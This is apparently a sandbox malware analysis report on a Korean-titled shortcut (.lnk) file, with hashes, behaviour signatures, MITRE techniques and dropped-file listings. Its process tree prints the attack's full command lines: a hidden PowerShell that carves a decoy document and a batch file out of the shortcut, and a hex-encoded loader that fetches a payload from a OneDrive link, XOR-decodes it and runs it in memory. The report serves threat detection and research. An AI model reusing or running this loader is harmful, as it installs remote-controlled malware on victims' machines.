6234ef67435dfcb65bd661b5f3bb0b77b82fe6cdd2109b6dfb9dea1b65a17d5d

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
04-04-2023 07:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

북 외교관 선발파견 및 해외공관.lnk
Size

29.7MB
MD5

657fd7317ccde5a0e0c182a626951a9f
SHA1

edb782f50c899555506150e097f6346deb3f6fb1
SHA256

c5c05f9df89fc803884fed2bd20a3824eae95eeb34a1827bf5210e4ac17beadd
SHA512

4ee451076b5adaae332d64559cae16482f6d2fd30292f50dbe9d21a7030621e71fe119b6532ec6a7ac1ef6c37e022dbea648db268bdfeb2bbabec281b03ec29e
SSDEEP

1536:f8hPldX8h7lPA7X2vmVMlMVMlcPYf+a+NsAJ93:fGV7bXhPYf+Fsa93

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

20 976 powershell.exe
22 976 powershell.exe
28 976 powershell.exe
50 976 powershell.exe
53 976 powershell.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

powershell.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation cmd.exe
Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\18573.dat powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
20	976	powershell.exe
22	976	powershell.exe
28	976	powershell.exe
50	976	powershell.exe
53	976	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	cmd.exe

description	ioc	process
File created	C:\Windows\18573.dat	powershell.exe

Modifies registry class 2 IoCs

Processes:

powershell.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exe

pid	process
1712	powershell.exe
1712	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1712 powershell.exe
Token: SeDebugPrivilege 976 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

OpenWith.exe

pid process

336 OpenWith.exe

description	pid	process
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	976	powershell.exe

pid	process
336	OpenWith.exe

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

cmd.execmd.exepowershell.execmd.execmd.exepowershell.execsc.execsc.execsc.execsc.exe

description	pid	process	target process
PID 2544 wrote to memory of 2608	2544	cmd.exe	cmd.exe
PID 2544 wrote to memory of 2608	2544	cmd.exe	cmd.exe
PID 2544 wrote to memory of 2608	2544	cmd.exe	cmd.exe
PID 2608 wrote to memory of 1712	2608	cmd.exe	powershell.exe
PID 2608 wrote to memory of 1712	2608	cmd.exe	powershell.exe
PID 2608 wrote to memory of 1712	2608	cmd.exe	powershell.exe
PID 1712 wrote to memory of 4532	1712	powershell.exe	cmd.exe
PID 1712 wrote to memory of 4532	1712	powershell.exe	cmd.exe
PID 1712 wrote to memory of 4532	1712	powershell.exe	cmd.exe
PID 4532 wrote to memory of 2652	4532	cmd.exe	cmd.exe
PID 4532 wrote to memory of 2652	4532	cmd.exe	cmd.exe
PID 4532 wrote to memory of 2652	4532	cmd.exe	cmd.exe
PID 2652 wrote to memory of 976	2652	cmd.exe	powershell.exe
PID 2652 wrote to memory of 976	2652	cmd.exe	powershell.exe
PID 2652 wrote to memory of 976	2652	cmd.exe	powershell.exe
PID 976 wrote to memory of 4340	976	powershell.exe	csc.exe
PID 976 wrote to memory of 4340	976	powershell.exe	csc.exe
PID 976 wrote to memory of 4340	976	powershell.exe	csc.exe
PID 4340 wrote to memory of 4260	4340	csc.exe	cvtres.exe
PID 4340 wrote to memory of 4260	4340	csc.exe	cvtres.exe
PID 4340 wrote to memory of 4260	4340	csc.exe	cvtres.exe
PID 976 wrote to memory of 2360	976	powershell.exe	csc.exe
PID 976 wrote to memory of 2360	976	powershell.exe	csc.exe
PID 976 wrote to memory of 2360	976	powershell.exe	csc.exe
PID 2360 wrote to memory of 4496	2360	csc.exe	cvtres.exe
PID 2360 wrote to memory of 4496	2360	csc.exe	cvtres.exe
PID 2360 wrote to memory of 4496	2360	csc.exe	cvtres.exe
PID 976 wrote to memory of 4936	976	powershell.exe	csc.exe
PID 976 wrote to memory of 4936	976	powershell.exe	csc.exe
PID 976 wrote to memory of 4936	976	powershell.exe	csc.exe
PID 4936 wrote to memory of 1104	4936	csc.exe	cvtres.exe
PID 4936 wrote to memory of 1104	4936	csc.exe	cvtres.exe
PID 4936 wrote to memory of 1104	4936	csc.exe	cvtres.exe
PID 976 wrote to memory of 3708	976	powershell.exe	csc.exe
PID 976 wrote to memory of 3708	976	powershell.exe	csc.exe
PID 976 wrote to memory of 3708	976	powershell.exe	csc.exe
PID 3708 wrote to memory of 3192	3708	csc.exe	cvtres.exe
PID 3708 wrote to memory of 3192	3708	csc.exe	cvtres.exe
PID 3708 wrote to memory of 3192	3708	csc.exe	cvtres.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\북 외교관 선발파견 및 해외공관.lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0001DAB452} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00065446 -ReadCount 00065446; $pdfPath = 'C:\Users\Admin\AppData\Local\Temp\230401.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002470)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00068696 -ReadCount 00068696; $exePath = 'C:\Users\Admin\AppData\Local\Temp\230401.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00065446)) -Encoding Byte; ^& $exePath;
2⤵
- Suspicious use of WriteProcessMemory
PID:2608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0001DAB452} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00065446 -ReadCount 00065446; $pdfPath = 'C:\Users\Admin\AppData\Local\Temp\230401.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 002470)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00068696 -ReadCount 00068696; $exePath = 'C:\Users\Admin\AppData\Local\Temp\230401.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00065446)) -Encoding Byte; & $exePath;
3⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\230401.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:4532

\??\c:\Windows\SysWOW64\cmd.exe
c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$ppams ="$eric5="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C3355766379464264544A746554463461445A304F46686E556A4A4E656D317A4F47356F556E64764C545A4350325539616B6849517A5A352F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$bulst="""""";for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
5⤵
- Suspicious use of WriteProcessMemory
PID:2652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "$ppams ="$eric5="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C3355766379464264544A746554463461445A304F46686E556A4A4E656D317A4F47356F556E64764C545A4350325539616B6849517A5A352F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$bulst="""""";for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
6⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:976

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\saq1p3s2\saq1p3s2.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:4340

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES97EF.tmp" "c:\Users\Admin\AppData\Local\Temp\saq1p3s2\CSCEDD2DC90DC3F4308A0518BAD26B1D81.TMP"
8⤵
PID:4260

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jsl3bjz4\jsl3bjz4.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:2360

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9ABE.tmp" "c:\Users\Admin\AppData\Local\Temp\jsl3bjz4\CSCCA91C34416D84B14B5FCFAABEF2E455.TMP"
8⤵
PID:4496

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\axn4t15a\axn4t15a.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:4936

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C25.tmp" "c:\Users\Admin\AppData\Local\Temp\axn4t15a\CSC7AB4BBD61D3B41CD9EEB686BD8BCDE85.TMP"
8⤵
PID:1104

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z25a54rj\z25a54rj.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:3708

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C83.tmp" "c:\Users\Admin\AppData\Local\Temp\z25a54rj\CSCA070E329AFEB453DA37A872EF75ABF43.TMP"
8⤵
PID:3192

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:336

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
0774a05ce5ee4c1af7097353c9296c62

SHA1
658ff96b111c21c39d7ad5f510fb72f9762114bb

SHA256
d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4

SHA512
104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
61e99d790e9989d17cff7bc8a42eab8c

SHA1
45dc52a2eb40f99b77ef67e851e54d0e5ecc2ddc

SHA256
f766ea565cc39993cad72fdc5c451b44f47d88f019f0ecaf45ef40c3cf35b1e6

SHA512
3bfe6ff40563569d28bcbba8b58cada16672c31b0b39bb9bc225fe83da099e269562feedce2d5ede939afe57afe5d15e7db21421aa9be37a8e6632c5adc91d6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\230401.bat
Filesize
3KB

MD5
461ce7d6c6062d1ae33895d1f44d98fb

SHA1
76e9c63f48121faf26bc1046eac27ec6967e64d4

SHA256
70f9216f0c5badb24120f74270dbbc5100b07c4fc6eb45f6652b00882290a73c

SHA512
680e1503a4ce7fe49ebe559531102710a2b50e59ee65d6aa20a0af1d8a58a4986f198c8f03a58bdb13fcc76cedc9724812e8948a42b45c8a6066bb250554f03b

Download Submit
C:\Users\Admin\AppData\Local\Temp\311B1036.tmp
Filesize
53KB

MD5
c6c40cb97d33fd371958ecf40e8aaf3b

SHA1
4695851af7f1a9ea5d80906a9d542fea59863684

SHA256
a85b4bf35de123722827a1363a10bc5786578ee4e9e2fc438935b78bbc5426b3

SHA512
f97857ba8d145f399288b80e3f10b6a85b291f26d4aa3ca7294117192933053b597a952fb07501804fb1440078ee5347a187bc6dc97c7241d8371b760bab87e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES97EF.tmp
Filesize
1KB

MD5
8a8c8865e0934bbd83c89114c801dd47

SHA1
c9b12f48d97e6b1709060f4ddae13b9f78a0d6cc

SHA256
d1b4ca4680de99eb3c5a8a0723632910bdc7c6887f24a4ea4b205f912e13b6e7

SHA512
0a5de630e153e506f7631a19041a8a779795e6dc71f073be26515d9302fe254b470382c70ca5d56ec39a215c54ef8f344e52447c71fbf04e2a3e0b7b8c0aa803

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9ABE.tmp
Filesize
1KB

MD5
9ecc400745c084525cc6c31a21282b1f

SHA1
1043334162c925bfb1edf5b05581c3c15cb50de3

SHA256
a30d2ef22935fca484885b45e8ee7ffd264c75f2dd2587421a7092b025bea6c1

SHA512
9534422e408b7deb12f26e4fdf534db63eb5423ae195d9d3c12fc7a4ec45130f94d8a575e3a260bd56348024dafdde4e41dbd21ce69f5ed8f080bfd92f1b1699

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9C25.tmp
Filesize
1KB

MD5
002207dcbafc1e76d20f75fc470b973e

SHA1
59d2d81f1455fc20e6509fdf69dcb641f29721b3

SHA256
989bb50224801ba1bac0291b7c916efae95308e48a48596b21f149723890b497

SHA512
db209a1ddb9fdc88d1413cedebdddf318f96973ecc0de50a8f049d52687e45c0ecbfd6386c6c19a09faeb5720a39ba4e58bf36204ed70a6235c218bf65e02c70

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9C83.tmp
Filesize
1KB

MD5
7c2f63c7a7f7f71a3d14b38b4e4aa32a

SHA1
730be6801e0c651dc2cda2d4ed33b9e0d3f954b3

SHA256
1fc4fdcb6a8e8c1e7cec5ac6486bc3274ccdc95b56b475b2d55a5e0332afd58d

SHA512
a9cf786f69b6209c5798c35acf2900f7ade219add207437b1957347677b1fe110526f5e3cb3d60e67da8ee26009ea203b67baa2e3781afa9d012bd712cc8af38

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tk3skmsx.zyw.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\axn4t15a\axn4t15a.dll
Filesize
3KB

MD5
f887ed240e0d889279153c192ada3f0b

SHA1
d13e297ef4517c9440f1174a6777114060099f41

SHA256
2baaec00398e2924eb90b67962e97660cd265cdb45fa1e24d9a2b48a5ce51596

SHA512
326f8f77ebffb874260c2f684f69062da58c45e0fce450782bee9bd0930f95256d1acda50f975de3e68067c00644263d5be8e375a84c298f0f09867a6cc2de80

Download Submit
C:\Users\Admin\AppData\Local\Temp\jsl3bjz4\jsl3bjz4.dll
Filesize
3KB

MD5
5734b6555808350fbb17a4f39b03ddd1

SHA1
89491ef7c20e7c59e9c6fad735ad881934b2d3f1

SHA256
67417c42eb0d5aeb6f3da0b73d5271f6c90932c2a408e4928ecdafa0e64f7316

SHA512
40bd31bde9969082f120bf4e1671b72de5b8c408e915b6fb6d74e8f232b1e05460c3bb380c08e075e037a6949165ff7c97387243a0082ad4878e8c8c5ac61ce2

Download Submit
C:\Users\Admin\AppData\Local\Temp\saq1p3s2\saq1p3s2.dll
Filesize
3KB

MD5
611bae789d821a84238978f2a3405713

SHA1
fd128d795eebb728ae6203cefcd77e734d0d5037

SHA256
7471f8be14903e68ece6ec56f7498295da3910d240b4dbee30cdc26ca7ea9d71

SHA512
f4524b77ddb5ff4ffd61966776b6585bd26904b552e7c3ed89bd80daf4763211810492a2c9a95b2e4195401740c3c664daae23cbd01539f7f6d5c759f02e3d54

Download Submit
C:\Users\Admin\AppData\Local\Temp\z25a54rj\z25a54rj.dll
Filesize
3KB

MD5
8a98810297712071769f74d08bfd6c16

SHA1
b84faac5915bf71ad473c478417fae288d1a4f67

SHA256
0958206fd56ca937620ebe9ce51b18b9346c3a0ece5836c579aab92ba3cd9e3a

SHA512
7322d6a48b5ecf1e8f375ee149cdd9379c8263dec6090ccf9f52458b70a52b4a041a6d34a3349ce1e4c57c89f5e08fe3bd88e3afd6e64fc874e167fffff5c36a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\axn4t15a\CSC7AB4BBD61D3B41CD9EEB686BD8BCDE85.TMP
Filesize
652B

MD5
2228cb2aaa08fb1f9cd50840f5e3b248

SHA1
ce3c9815ca44ce0576028b311d60c7bc341bef2f

SHA256
e17715ce8ea6cafe03284ce6ffbe04115bc73ba4e7ae6fff4852300824ad15d4

SHA512
13ed53cd10070f7e21a92ee9340b1780c71ee63381ba6d0cf9869d11a16d73284fa1c9143078c3df92b5c2387692b1a99b948610d97111e9e10ba51beb57f4af

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\axn4t15a\axn4t15a.0.cs
Filesize
286B

MD5
b23df8158ffd79f95b9bddd18738270b

SHA1
79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

SHA256
856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

SHA512
e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\axn4t15a\axn4t15a.cmdline
Filesize
369B

MD5
5c37de96112287cea59aaaec0c00675f

SHA1
450d54db8142cd8704dbbf95d25dff1685e3a109

SHA256
f9cb25fb241adb933013b3a5e5506543e5998e1bff0ae6a45176b3682bfc4d16

SHA512
b6838715281b9ef8c16acb4e7d5faa3c70252a0cc1cd446def2b7720ad40084404807cb5a61e9f909386f5adea35b66e06d88c2d9e35f96978b439e8441cc6ee

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jsl3bjz4\CSCCA91C34416D84B14B5FCFAABEF2E455.TMP
Filesize
652B

MD5
276dd2801025e49423e5a85ceccedd1c

SHA1
0e6e43faf29c217aae572eed804801c0df66523b

SHA256
d239415784d9012d5a9363f22d17d6b4e0468b479d3e3c2aeef26c2651a98bd0

SHA512
62e339b8aedef212108d6a14b481dca40d749e2fd17f1099a92e4b16837556edc51a53bb909f2cfa9c205e8bd93355b73e20d858765e5b053ac2027aa580d06e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jsl3bjz4\jsl3bjz4.0.cs
Filesize
272B

MD5
4de985ae7f625fc7a2ff3ace5a46e3c6

SHA1
935986466ba0b620860f36bf08f08721827771cb

SHA256
53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

SHA512
067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jsl3bjz4\jsl3bjz4.cmdline
Filesize
369B

MD5
60163321db5d7be2e5d13266ff218717

SHA1
51982e1fbef1db5b45fca0e0e50d21a9f866701c

SHA256
0a5b712f825f53318052b8d62d953b70ed28ef02fa726e800e85c000dd52d832

SHA512
b12ac39c8c6daa1b4be2849db2f1c914123346e15ed99173bcc091dd2b329ad22821284ab42fedf398b1ee69788248f52b63ff96fb33cde6f00e612b7c173efc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\saq1p3s2\CSCEDD2DC90DC3F4308A0518BAD26B1D81.TMP
Filesize
652B

MD5
4333a496726aaa33c28975728c405a01

SHA1
af49e76b500a5c8ecda6ff9ccb622cdeaaff85ee

SHA256
db010a5ae4c42d8bbf136805c196139c43250b51e8ef9bdf00ee61b0e3fd85f9

SHA512
68280799eb6703bc963bf623dd5e1f358eaedd1128e1b713c5537ea7909cbdf0f06d3ce7ae78fee823313844e929863de755a9238c0ac632def6bcfbc054edee

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\saq1p3s2\saq1p3s2.0.cs
Filesize
249B

MD5
69ecfeb3e9a8fb7890d114ec056ffd6d

